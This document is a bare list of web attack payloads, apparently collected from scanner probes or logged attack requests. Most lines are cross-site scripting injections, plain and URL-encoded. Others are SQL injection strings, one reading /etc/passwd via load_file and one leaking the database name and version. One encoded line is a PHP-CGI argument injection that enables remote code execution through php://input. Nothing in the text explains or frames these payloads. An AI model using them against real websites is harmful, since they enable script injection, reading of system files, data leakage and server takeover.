'"--></style></scRipt><scRipt>alert(0x000936)</scRipt>
'"--></style></scRipt><scRipt>alert(0x0044C4)</scRipt>
'"--></style></scRipt><scRipt>alert(0x00690C)</scRipt>
'"--></style></scRipt><scRipt>alert(0x00D064)</scRipt>
'"--></style></scRipt><scRipt>alert(0x00687C)</scRipt>
'"--></style></scRipt><scRipt>alert(0x00D33A)</scRipt>
'"--></style></scRipt><scRipt>alert(0x00627A)</scRipt>
'"--></style></scRipt><scRipt>alert(0x001D34)</scRipt>
: '" onmouseover= alert(0x000C5A)
'" onmouseover= alert(0x0000DE)
/"onmouseover="alert(0x00170E)
%22%20onmouseover=alert%28/XSSPOSED/%29%20%22
"><svg/onload=alert('XSSPOSED')<"&pwd1=33&Log=Log+in&id1=&pwd11=&pwd21=&email1=
%22%3E%3Cscript%3E+-+-1-+-+alert%28/XSSPOSED/%29%3C/script%3E
%22%3E%3Cscript%3Ealert%28/XSSPOSED/%29%3C/script%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E
%27%3E%3C/script%3E%3Cscript%3Ejavascript:alert(/XSSPOSED/)%3C/script%3E
%22%3E%3Cbody/onpageshow=%28alert%29%28/XSSPOSED/%29%3E&kw=lol&x=0&y=0
%3Cscript%3E+alert(%22XSSPOSED%22)%3C/script%3E
\"><script>alert(document.domain)</script>.html
<script>alert(document.domain)</script>
phpinfo&<script>alert('j97w_qaf3')</script>
xyz%0a%0a<script>alert(7738);</script>abc.jsp
<script>alert(7738);</script>abc.jsp
\"><script>alert(document.domain)</script>&showGuiMessaging=\"><script>alert(document.domain)</script>
\"><script>alert(document.domain)</script>&lang=\"><script>alert(document.domain)</script>&showGuiMessaging=\"><script>alert(document.domain)</script>
-1'%20UNION%20select%20load_file('/etc/passwd')%20as%20avatar,%20load_file('/etc/passwd')%20as%20type%20,1%20as%20uid/*
\"%2F><script>alert(\"XSS\")%3B<%2Fscript>
\"%2F><script>alert(\"XSS\")%3B<%2Fscript>#
<script>qly(007);</script><!--\";}}}}
%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2881,85,65,76,89,83,88,83,83,84,69,83,84%29%29%3C/script%3E
%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
\"><script>alert(document.domain)</script>.shtml
~<img%20src=\"test\"%20onclick=\"alert('XSS')\">
<script>alert(64541)</script>
[]=1=0))+union+select+1,2,3,4,concat(0x5175616c79735f53514c495f4173736573736d656e745f,database(),0x5f,version()),6,7,8,9,10,11,12,13,14,15,15,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+
\"></script><script>alert(12345);</script>
%22/%3E%3CSCRIPT%3Ealert%28%22XSSTest%22%29%3C/SCRIPT%3E%3C%22
%22%3E%3Cscript%3Ealert%28%22UberXSSTestString%22%29;%3C/script%3E
